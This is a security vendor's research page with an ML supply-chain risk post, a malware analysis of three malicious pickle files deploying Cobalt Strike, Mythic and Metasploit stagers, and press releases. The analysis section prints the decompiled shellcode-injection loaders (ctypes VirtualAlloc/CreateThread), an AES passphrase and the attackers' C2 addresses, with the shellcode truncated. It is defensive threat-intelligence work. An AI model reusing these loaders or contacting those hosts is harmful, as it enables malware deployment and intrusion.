Advancing the Science of AI Security
The HiddenLayer AI Security Research team uncovers vulnerabilities, develops defenses, and shapes global standards to ensure AI remains secure, trustworthy, and resilient.



Turning Discovery Into Defense
Our mission is to identify and neutralize emerging AI threats before they impact the world. The HiddenLayer AI Security Research team investigates adversarial techniques, supply chain compromises, and agentic AI risks, transforming findings into actionable security advancements that power the HiddenLayer AI Security Platform and inform global policy.
Our AI Security Research Team
HiddenLayer’s research team combines offensive security experience, academic rigor, and a deep understanding of machine learning systems.

Kenneth Yeung
Senior AI Security Researcher

Conor McCauley
Adversarial Machine Learning Researcher

Jim Simpson
Principal Intel Analyst

Jason Martin
Director, Adversarial Research

Andrew Davis
Chief Data Scientist

Marta Janus
Principal Security Researcher
%201.png)
Eoin Wickens
Director of Threat Intelligence

Kieran Evans
Principal Security Researcher

Ryan Tracey
Principal Security Researcher
%201%20(1).png)
Kasimir Schulz
Director, Security Research
Our Impact by the Numbers
Quantifying the reach and influence of HiddenLayer’s AI Security Research.
CVEs and disclosures in AI/ML frameworks
bypasses of AIDR at hacking events, BSidesLV, and DEF CON.
Cloud Events Processed
Latest Discoveries
Explore HiddenLayer’s latest vulnerability disclosures, advisories, and technical insights advancing the science of AI security.

Supply Chain Threats: Critical Look at Your ML Ops Pipeline
In a Nutshell:
- A supply chain attack can be incredibly damaging, far-reaching, and an all-round terrifying prospect.
- Supply chain attacks on ML systems can be a little bit different from the ones you’re used to.;
- ML is often privy to sensitive data that you don’t want in the wrong hands and can lead to big ramifications if stolen.
- We pose some pertinent questions to help you evaluate your risk factors and more accurately perform threat modeling.
- We demonstrate how easily a damaging attack can take place, showing the theft of training data stored in an S3 bucket through a compromised model.
For many security practitioners, hearing the term ‘supply chain attack’ may still bring on a pang of discomfort and unease - and for good reason. Determining the scope of the attack, who has been affected, or discovering that your organization has been compromised is no easy thought and makes for an even worse reality. A supply-chain attack can be far-reaching and demolishes the trust you place in those you both source from and rely on. But, if there’s any good that comes from such a potentially catastrophic event, it’s that they serve as a stark reminder of why we do cybersecurity in the first place.
To protect against supply chain attacks, you need to be proactive. By the time an attack is disclosed, it may already be too late - so prevention is key. So too, is understanding the scope of your potential exposure through supply chain risk management. Hopefully, this sounds all too familiar, if not, we’ll lightly cover this later on.
The aim of this blog is to highlight the similarly affected technologies involved within the Machine Learning supply chain and the varying levels of risk involved. While it bears some resemblance to the software supply chain you’re likely used to, there are a few key differences that set them apart. By understanding this nuance, you can begin to introduce preventative measures to help ensure that both your company and its reputation are left intact.
The Impact

Over the last few years, supply chain attacks have been carved into the collective memory of the security community through major attacks such as SolarWinds and Kaseya - amongst others. With the SolarWinds breach, it is estimated that close to a hundred customers were affected through their compromised Orion IT management software, spanning public and private sector organizations alike. Later, the Kaseya incident reportedly affected over a thousand entities through their VSA management software - ultimately resulting in ransomware deployment.
The magnitude of the attacks kicked the industry into overdrive - examining supply-side exposure, increasing scrutiny on 3rd party software, and implementing more holistic security controls. But it’s a hard problem to solve, the components of your supply chain are not always apparent, especially when it’s constantly evolving.
The Root Cause
So what makes these attacks so successful - and dangerous? Well, there are two key factors that the adversary exploits:
- Trust - Your software provider isn’t an APT group, right? The attacker abuses the existing trust between the producer and consumer. Given the supplier’s prevalence and reputation, their products often garner less scrutiny and can receive more lax security controls.
- Reach - One target, many victims. The one-to-many business model means that an adversary can affect the downstream customers of the victim organization in one fell swoop.
The ML Supply Chain
ML is an incredibly exciting space to be in right now, with huge advances gracing the collective newsfeed almost every week. Models such as DALL-E and Stable Diffusion are redefining the creative sphere, while AlphaTensor beats 50-year-old math records, and ChatGPT is making us question what it means to be human. Not to mention all the datasets, frameworks, and tools that enable and support this rapid progress. What’s more, outside of the computing cost, access to ML research is largely free and readily available for you to download and implement in your own environment.;
But, like one uncle to a masked hero said - with great sharing, comes great need for security - or something like that. Using lessons we’ve learned from dealing with past incidents, we looked at the ML Supply Chain to understand where people are most at risk and provided some questions to ask yourself to help evaluate your risk factors:

Data Collection
A model is only as good as the dataset that it’s trained on, and it can often prove difficult to gather appropriate real-world data in-house. In many cases, you will have to source your dataset externally - either from a data-sharing repository or from a specific data provider. While often necessary, this can open you up to the world of data poisoning attacks, which may not be realized until late into the MLOps lifecycle. The end result of data poisoning is the production of an inaccurate, flawed, or subverted model, which can have a host of negative consequences.
- Is the data coming from a trusted source? e.g., You wouldn’t want to train your medical models on images scraped from a subreddit!
- Can the integrity of the data be assured?
- Can the data source be easily compromised or manipulated? See Microsoft's 'Tay'.
Model Sourcing
One of the most expensive parts of any ML pipeline is the cost of training your model - but it doesn’t always have to be this way. Depending on your use case, building advanced complex models can prove to be unnecessary, thanks to both the accessibility and quality of pre-trained models. It’s no surprise that pre-trained models have quickly become the status quo in ML - as this compact result of vast, expensive computation can be shared on model repositories such as HuggingFace, without having to provide the training data - or processing power.
However, such models can contain malicious code, which is especially pertinent when we consider the resources ML environments often have access to, such as other models, training data (which may contain PII), or even S3 buckets themselves.
- Is it possible that the model has been hijacked, tampered or compromised in some other manner?;
- Is the model free of backdoors that could allow the attacker to routinely bypass it by giving it specific input?
- Can the integrity of the model be verified?
- Is the environment the model is to be executed in as restricted as possible? E.g., ACLs, VPCs, RBAC, etc
ML Ops Tooling
Unless you’re painstakingly creating your own ML framework, chances are you depend on third-party software to build, manage and deploy your models. Libraries such as TensorFlow, PyTorch, and NumPy are mainstays of the field, providing incredible utility and ease to data scientists around the world. But these libraries often depend on additional packages, which in turn have their own dependencies, and so on. If one such dependency was compromised or a related package was replaced with a malicious one, you could be in big trouble.
A recent example of this is the ‘torchtriton’ package which, due to dependency confusion with PyPi, affected PyTorch-nightly builds for Linux between the 25th and 30th of December 2022. Anyone who downloaded the PyTorch nightly in this time frame inadvertently downloaded the malicious package, where the attacker was able to hoover up secrets from the affected endpoint. Although the attacker claims to be a researcher, the theft of ssh keys, passwd files, and bash history suggests otherwise.
If that wasn’t bad enough, widely used packages such as Jupyter notebook can leave you wide open for a ransomware attack if improperly configured. It’s not just Python packages, though. Any third-party software you employ puts you at risk of a supply chain attack unless it has been properly vetted. Proper supply chain risk management is a must!
- What packages are being used on the endpoint?
- Is any of the software out-of-date or contain known vulnerabilities?
- Have you verified the integrity of your packages to the best of your ability?
- Have you used any tools to identify malicious packages? E.g., DataDog’s GuardDog
Build & Deployment
While it could be covered under ML Ops tooling, we wanted to draw specific attention to the build process for ML. As we saw with the SolarWinds attack, if you control the build process, you control everything that gets sent downstream. If you don’t secure your build process sufficiently, you may be the root cause of a supply chain attack as opposed to the victim.
- Are you logging what’s taking place in your build environment?
- Do you have mitigation strategies in place to help prevent an attack?
- Do you know what packages are running in your build environment?
- Are you purging your build environment after each build?
- Is access to your datasets restricted?
As for deployment - your model will more than likely be hosted on a production system and exposed to end users through a REST API, allowing these stakeholders to query it with their relevant data and retrieve a prediction or classification. More often than not, these results are business-critical, requiring a high degree of accuracy. If a truly insidious adversary wanted to cause long-term damage, they might attempt to degrade the model’s performance or affect the results of the downstream consumer. In this situation, the onus is on the deployer to ensure that their model has not been compromised or its results tampered with.
- Is the integrity of the model being routinely verified post-deployment?
- Do the model’s outputs match those of the pre-deployment tests?
- Has drift affected the model over time, where it’s now providing incorrect results?
- Is the software on the deployment server up to date?
- Are you making the best use of your cloud platform's security controls?
A Worst Case Scenario - SageMaker Supply Chain Attack
A picture paints a thousand words, and as we’re getting a little high on word count, we decided to go for a video demonstration instead. To illustrate the potential consequences of an ML-specific supply chain attack, we use a cloud-based ML development platform - Amazon Sagemaker and a hijacked model - however it could just as well be a malicious package or an ML-adjacent application with a security vulnerability. This demo shows just how easy it is to steal training data from improperly configured S3 buckets, which could be your customers’ PII, business-sensitive information, or something else entirely.
https://youtu.be/0R5hgn3joy0
Mitigating Risk
It Pays to Be Proactive
By now, we’ve heard a lot of stomach-churning stuff, but what can we do about it? In April of 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a 16-page security advisory to advise organizations on how to defend themselves through a series of proactive measures to help prevent a supply chain attack from occurring. More specifically, they talk about using frameworks such as Cyber Supply Chain Risk Management (C-SCRM) and Secure Software Development Framework (SSDF). We wish that ML was free of the usual supply chain risks, many of these points still hold true - with some new things to consider too.
Integrity & Verification
Verify what you can, and ensure the integrity of the data you produce and consume. In other words, ensure that the files you get are what you hoped you’d get. If not, you may be in for a nasty surprise. There are many ways to do this, from cryptographic hashing to certificates to a deeper dive manual inspection.
Keep Your (Attack) Surfaces Clean
If you’re a fan of cooking, you’ll know that the cooking is the fun part, and the cleanup - not so much. But that cleanup means you can cook that dish you love tomorrow night without the chance of falling ill. By the same virtue, when you’re building ML systems, make sure you clean up any leftover access tokens, build environments, development endpoints, and data stores. If you clean as you go, you’re mitigating risk and ensuring that the next project goes off without a hitch. Not to mention - a spring clean in your cloud environment may save your organization more than a few dollars at the end of the month.
Model Scanning
In past blogs, we’ve shown just how dangerous a model can be and highlighted how attackers are actively using model formats such as Pickle as a launchpad for post-exploitation frameworks. As such, it’s always a good idea to inspect your models thoroughly for signs of malicious code or illicit tampering. We released Yara rules to aid in the detection of particular varieties of hijacked models and also provide a model scanning service to provide an added layer of confidence.
Cloud Security
Make use of what you’ve got, many cloud service providers provide some level of security mechanisms, such as Access Control Lists (ACLs), Virtual Private Cloud (VPCs), Role Based Access Control (RBAC), and more. In some cases, you can even disconnect your models from the internet during training to help mitigate some of the risks - though this won’t stop an attacker from waiting until you’re back online again.
In Conclusion
While being in a state of hypervigilance can be tiring, looking critically at your ML Ops pipeline every now and again is no harm, in fact, quite the opposite. Supply-chain attacks are on the rise, and the rules of engagement we’ve learned through dealing with them very much apply to Machine Learning. The relative modernity of the space, coupled with vast stores of sensitive information and accelerating data privacy regulation means that attacks on ML supply chains have the potential to be explosively damaging in a multitude of ways.
That said, the questions we pose in this blog can help with threat modeling for such an event, mitigate risk and help to improve your overall security posture.

Pickle Files: The New ML Model Attack Vector
Introduction
In our previous blog post, “Weaponizing Machine Learning Models with Ransomware”, we uncovered how malware can be surreptitiously embedded in ML models and automatically executed using standard data deserialization libraries - namely pickle.;
Shortly after publishing, several people got in touch to see if we had spotted adversaries abusing the pickle format to deploy malware - and as it transpires, we have.

In this supplementary blog, we look at three malicious pickle files used to deploy Cobalt Strike, Metasploit and Mythic respectively, with each uploaded to public repositories in recent months. We provide a brief analysis on these files to show how this attack vector is being actively exploited in the wild.;
Findings
Cobalt Strike Stager
SHA256: 391f5d0cefba81be3e59e7b029649dfb32ea50f72c4d51663117fdd4d5d1e176
The first malicious pickle file (serialized with pickle protocol version 3) was uploaded in January 2022 and uses the built-in Python exec function to execute an embedded Python script. The script relies on the ctypes library to invoke Windows APIs such as VirtualAlloc and CreateThread. In this way, it injects and runs a 64-bit Cobalt Strike stager shellcode.
We’ve used a simple pickle “disassembler” based on code from Kaitai Struct (http://formats.kaitai.io/python_pickle/) to highlight the opcodes used to execute each payload:
\x80 proto: 3
\x63 global_opcode: builtins exec
\x71 binput: 0
\x58 binunicode:
import ctypes,urllib.request,codecs,base64
AbCCDeBsaaSSfKK2 = "WEhobVkxeDRORGhj" // shellcode, truncated for readability
AbCCDe = base64.b64decode(base64.b64decode(AbCCDeBsaaSSfKK2))
AbCCDe =codecs.escape_decode(AbCCDe)[0]
AbCCDe = bytearray(AbCCDe)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(AbCCDe)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(AbCCDe)).from_buffer(AbCCDe)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(AbCCDe)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
\x71 binput: 1
\x85 tuple1
\x71 binput: 2
\x52 reduce
\x71 binput: 3
\x2e stop
The base64 encoded shellcode from this sample connects to https://121.199.68[.]210/Swb1 with a unique User-Agent string Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP09; NP09; MAAU)

The IP hardcoded in this shellcode appears in various intel feeds in relation to CobaltStrike activity; a few different CobaltStrike stagers were spotted talking to this IP, and a beacon DLL, which used to be hosted there at some point, features a watermark that is associated with many cybercriminal groups, including TrickBot/SmokeLoader, Nobelium, and APT29.

Mythic Stager
SHA256: 806ca6c13b4abaec1755de209269d06735e4d71a9491c783651f48b0c38862d5
The second sample (serialized using pickle protocol version 4) appeared in the wild in July 2022. It’s rather similar to the first one in the way it uses the ctypes library to load and execute a 32-bit Cobalt Strike stager shellcode.
\x80 proto: 4
\x95 frame: 5397
\x8c short_binunicode: builtins
\x94 memoize
\x8c short_binunicode: exec
\x94 memoize
\x93 stack_global
\x94 memoize
\x58 binunicode:
import base64
import ctypes
import codecs
shellcode= "" // removed for readability
shellcode = base64.b64decode(shellcode)
shellcode = codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
\x94 memoize
\x85 tuple1
\x94 memoize
\x52 reduce
\x94 memoize
\x2e stop
In this case, the shellcode connects to 43.142.60[.]207:9091/7Iyc with the User-Agent set to Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

The hardcoded IP address was recently mentioned in the Team Cymru report on Mythic C2 framework. Mythic is a Python-based post-exploitation red teaming platform and an open source alternative to Cobalt Strike. By pivoting on the E-Tag value that is present in HTTP headers of Mythic-related requests, Team Cymru researchers were able to find a list of IPs that are likely related to Mythic - and this IP was one of them.;
What’s interesting is that just over 4 months ago (August 2022) Mythic introduced a pickle wrapper module that allows for the C2 agent to be injected into a pickle-serialized machine learning model! This means that some pentesting exercises already consider ML models as an attack vector. However, Mythic is known to be used not only in red teaming activities, but also by some notorious cybercriminal groups, and has been recently spotted in connection to a 2022 campaign targeting Pakistani and Turkish government institutions, as well as spreading BazarLoader malware.
Metasploit Stager
SHA256: 9d11456e8acc4c80d14548d9fc656c282834dd2e7013fe346649152282fcc94b
This sample appeared under the name of favicon.ico in mid-November 2022, and features a bit more obfuscation than the previous two samples. The shellcode injection function is encrypted with AES-ECB with a hardcoded passphrase hello_i_4m_cc_12. The shellcode itself is computed using an arithmetic operation on a large int value and contains a Metasploit reverse-tcp shell that connects to a hardcoded IP 1.15.8.106 on port 6666.
\x80 proto: 3
\x63 global_opcode: builtins exec
\x71 binput: 0
\x58 binunicode:
import subprocess
import os
import time
from Crypto.Cipher import AES
import base64
from Crypto.Util.number import *
import random
while True:
ret = subprocess.run("ping baidu.com -n 1", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if ret.returncode==0:
key=b'hello_i_4m_cc_12'
a2=b'p5uzeWCm6STXnHK3 [...]' // truncated for readability
enc=base64.b64decode(a2)
ae=AES.new(key,AES.MODE_ECB)
num2=9287909549576993 [...] // truncated for readability
num1=(num2//888-777)//666
buf=long_to_bytes(num1)
exec(ae.decrypt(enc))
elif ret.returncode==1:
time.sleep(60)
\x71 binput: 1
\x85 tuple1
\x71 binput: 2
\x52 reduce
\x71 binput: 3
\x2e stop
The decrypted injection code is very much the same as observed previously, with Windows APIs being invoked through the ctypes library to inject the payload into executable memory and run it via a new thread.
import ctypes
shellcode = bytearray(buf)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c
The decoded shellcode turns out to be a 64-bit reverse-tcp stager:

The hardcoded IP address is located in China and was acting as a Cobalt Strike C2 server as late as of October 2022, according to multiple Cobalt Strike trackers.
Conclusions
Although we can't be 100% sure that the described malicious pickle files have been used in real-world attacks (as we lack enough contextual information), our findings definitively prove that the adversaries are already looking into this attack vector as a method of malware deployment. The IP addresses hardcoded in the above samples have been used in other in-the-wild malware, including various instances of Cobalt Strike and Mythic stagers, suggesting that these pickle-serialized shellcodes were not part of a legitimate research or a red teaming activity. This emerging trend highlights the intersection of adversarial machine learning and AI data poisoning, where attackers could manipulate the integrity of machine learning models by injecting malicious code via compromised datasets or models. As some of the post-exploitation and so-called “adversary emulation” frameworks are starting to build support for this attack vector, it’s only a matter of time until we see such attacks on the rise.
We’ve put together a set of YARA rules to detect malicious/suspicious pickle files which can be found in HiddenLayer's public BitBucket repository.
For more information on how model injection works, what are the possible case scenarios and consequences, and how can we mitigate the risks - check out our detailed blog on Weaponizing Machine Learning Models.;
Indicators of Compromise
[wpdatatable id=3]
In the News
HiddenLayer’s research is shaping global conversations about AI security and trust.

HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative
Underpinning HiddenLayer’s unique solution for the DoD and USIC is HiddenLayer’s Airgapped AI Security Platform, the first solution designed to protect AI models and development processes in fully classified, disconnected environments. Deployed locally within customer-controlled environments, the platform supports strict US Federal security requirements while delivering enterprise-ready detection, scanning, and response capabilities essential for national security missions.
Austin, TX – December 23, 2025 – HiddenLayer, the leading provider of Security for AI, today announced it has been selected as an awardee on the Missile Defense Agency’s (MDA) Scalable Homeland Innovative Enterprise Layered Defense (SHIELD) multiple-award, indefinite-delivery/indefinite-quantity (IDIQ) contract. The SHIELD IDIQ has a ceiling value of $151 billion and serves as a core acquisition vehicle supporting the Department of Defense’s Golden Dome initiative to rapidly deliver innovative capabilities to the warfighter.
The program enables MDA and its mission partners to accelerate the deployment of advanced technologies with increased speed, flexibility, and agility. HiddenLayer was selected based on its successful past performance with ongoing US Federal contracts and projects with the Department of Defence (DoD) and United States Intelligence Community (USIC). “This award reflects the Department of Defense’s recognition that securing AI systems, particularly in highly-classified environments is now mission-critical,” said Chris “Tito” Sestito, CEO and Co-founder of HiddenLayer. “As AI becomes increasingly central to missile defense, command and control, and decision-support systems, securing these capabilities is essential. HiddenLayer’s technology enables defense organizations to deploy and operate AI with confidence in the most sensitive operational environments.”
Underpinning HiddenLayer’s unique solution for the DoD and USIC is HiddenLayer’s Airgapped AI Security Platform, the first solution designed to protect AI models and development processes in fully classified, disconnected environments. Deployed locally within customer-controlled environments, the platform supports strict US Federal security requirements while delivering enterprise-ready detection, scanning, and response capabilities essential for national security missions.
HiddenLayer’s Airgapped AI Security Platform delivers comprehensive protection across the AI lifecycle, including:
- Comprehensive Security for Agentic, Generative, and Predictive AI Applications: Advanced AI discovery, supply chain security, testing, and runtime defense.
- Complete Data Isolation: Sensitive data remains within the customer environment and cannot be accessed by HiddenLayer or third parties unless explicitly shared.
- Compliance Readiness: Designed to support stringent federal security and classification requirements.
- Reduced Attack Surface: Minimizes exposure to external threats by limiting unnecessary external dependencies.
“By operating in fully disconnected environments, the Airgapped AI Security Platform provides the peace of mind that comes with complete control,” continued Sestito. “This release is a milestone for advancing AI security where it matters most: government, defense, and other mission-critical use cases.”
The SHIELD IDIQ supports a broad range of mission areas and allows MDA to rapidly issue task orders to qualified industry partners, accelerating innovation in support of the Golden Dome initiative’s layered missile defense architecture.
Performance under the contract will occur at locations designated by the Missile Defense Agency and its mission partners.
About HiddenLayer
HiddenLayer, a Gartner-recognized Cool Vendor for AI Security, is the leading provider of Security for AI. Its security platform helps enterprises safeguard their agentic, generative, and predictive AI applications. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Backed by patented technology and industry-leading adversarial AI research, HiddenLayer’s platform delivers supply chain security, runtime defense, security posture management, and automated red teaming.
Contact
SutherlandGold for HiddenLayer
hiddenlayer@sutherlandgold.com

HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments
As organizations rapidly adopt generative AI, they face increasing risks of prompt injection, data leakage, and model misuse. HiddenLayer’s security technology, built on AWS, helps enterprises address these risks while maintaining speed and innovation.
AUSTIN, TX — December 1, 2025 — HiddenLayer, the leading AI security platform for agentic, generative, and predictive AI applications, today announced expanded integrations with Amazon Web Services (AWS) Generative AI offerings and a major platform update debuting at AWS re:Invent 2025. HiddenLayer offers additional security features for enterprises using generative AI on AWS, complementing existing protections for models, applications, and agents running on Amazon Bedrock, Amazon Bedrock AgentCore, Amazon SageMaker, and SageMaker Model Serving Endpoints.
As organizations rapidly adopt generative AI, they face increasing risks of prompt injection, data leakage, and model misuse. HiddenLayer’s security technology, built on AWS, helps enterprises address these risks while maintaining speed and innovation.
“As organizations embrace generative AI to power innovation, they also inherit a new class of risks unique to these systems,” said Chris Sestito, CEO and Co-Founder of HiddenLayer. “Working with AWS, we’re ensuring customers can innovate safely, bringing trust, transparency, and resilience to every layer of their AI stack.”
Built on AWS to Accelerate Secure AI Innovation
HiddenLayer’s AI Security Platform and integrations are available in AWS Marketplace, offering native support for Amazon Bedrock and Amazon SageMaker. The company complements AWS infrastructure security by providing AI-specific threat detection, identifying risks within model inference and agent cognition that traditional tools overlook.
Through automated security gates, continuous compliance validation, and real-time threat blocking, HiddenLayer enables developers to maintain velocity while giving security teams confidence and auditable governance for AI deployments.
Alongside these integrations, HiddenLayer is introducing a complete platform redesign and the launches of a new AI Discovery module and an enhanced AI Attack Simulation module, further strengthening its end-to-end AI Security Platform that protects agentic, generative, and predictive AI systems.
Key enhancements include:
- AI Discovery: Identifies AI assets within technical environments to build AI asset inventories
- AI Attack Simulation: Automates adversarial testing and Red Teaming to identify vulnerabilities before deployment.
- Complete UI/UX Revamp: Simplified sidebar navigation and reorganized settings for faster workflows across AI Discovery, AI Supply Chain Security, AI Attack Simulation, and AI Runtime Security.
- Enhanced Analytics: Filterable and exportable data tables, with new module-level graphs and charts.
- Security Dashboard Overview: Unified view of AI posture, detections, and compliance trends.
- Learning Center: In-platform documentation and tutorials, with future guided walkthroughs.
HiddenLayer will demonstrate these capabilities live at AWS re:Invent 2025, December 1–5 in Las Vegas.
To learn more or request a demo, visit https://hiddenlayer.com/reinvent2025/.
About HiddenLayer
HiddenLayer, a Gartner-recognized Cool Vendor for AI Security, is the leading provider of Security for AI. Its platform helps enterprises safeguard agentic, generative, and predictive AI applications without adding unnecessary complexity or requiring access to raw data and algorithms. Backed by patented technology and industry-leading adversarial AI research, HiddenLayer delivers supply chain security, runtime defense, posture management, and automated red teaming.
For more information, visit www.hiddenlayer.com.
Press Contact:
SutherlandGold for HiddenLayer
hiddenlayer@sutherlandgold.com

HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity
On September 30, Databricks officially launched its <a href="https://www.databricks.com/blog/transforming-cybersecurity-data-intelligence?utm_source=linkedin&utm_medium=organic-social">Data Intelligence Platform for Cybersecurity</a>, marking a significant step in unifying data, AI, and security under one roof. At HiddenLayer, we’re proud to be part of this new data intelligence platform, as it represents a significant milestone in the industry's direction.
On September 30, Databricks officially launched its Data Intelligence Platform for Cybersecurity, marking a significant step in unifying data, AI, and security under one roof. At HiddenLayer, we’re proud to be part of this new data intelligence platform, as it represents a significant milestone in the industry's direction.
Why Databricks’ Data Intelligence Platform for Cybersecurity Matters for AI Security
Cybersecurity and AI are now inseparable. Modern defenses rely heavily on machine learning models, but that also introduces new attack surfaces. Models can be compromised through adversarial inputs, data poisoning, or theft. These attacks can result in missed fraud detection, compliance failures, and disrupted operations.
Until now, data platforms and security tools have operated mainly in silos, creating complexity and risk.
The Databricks Data Intelligence Platform for Cybersecurity is a unified, AI-powered, and ecosystem-driven platform that empowers partners and customers to modernize security operations, accelerate innovation, and unlock new value at scale.
How HiddenLayer Secures AI Applications Inside Databricks
HiddenLayer adds the critical layer of security for AI models themselves. Our technology scans and monitors machine learning models for vulnerabilities, detects adversarial manipulation, and ensures models remain trustworthy throughout their lifecycle.
By integrating with Databricks Unity Catalog, we make AI application security seamless, auditable, and compliant with emerging governance requirements. This empowers organizations to demonstrate due diligence while accelerating the safe adoption of AI.
The Future of Secure AI Adoption with Databricks and HiddenLayer
The Databricks Data Intelligence Platform for Cybersecurity marks a turning point in how organizations must approach the intersection of AI, data, and defense. HiddenLayer ensures the AI applications at the heart of these systems remain safe, auditable, and resilient against attack.
As adversaries grow more sophisticated and regulators demand greater transparency, securing AI is an immediate necessity. By embedding HiddenLayer directly into the Databricks ecosystem, enterprises gain the assurance that they can innovate with AI while maintaining trust, compliance, and control.
In short, the future of cybersecurity will not be built solely on data or AI, but on the secure integration of both. Together, Databricks and HiddenLayer are making that future possible.
FAQ: Databricks and HiddenLayer AI Security
What is the Databricks Data Intelligence Platform for Cybersecurity?
The Databricks Data Intelligence Platform for Cybersecurity delivers the only unified, AI-powered, and ecosystem-driven platform that empowers partners and customers to modernize security operations, accelerate innovation, and unlock new value at scale.
Why is AI application security important?
AI applications and their underlying models can be attacked through adversarial inputs, data poisoning, or theft. Securing models reduces risks of fraud, compliance violations, and operational disruption.
How does HiddenLayer integrate with Databricks?
HiddenLayer integrates with Databricks Unity Catalog to scan models for vulnerabilities, monitor for adversarial manipulation, and ensure compliance with AI governance requirements.
Get all our Latest Research & Insights
Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.
Thanks for your message!
We will reach back to you as soon as possible.


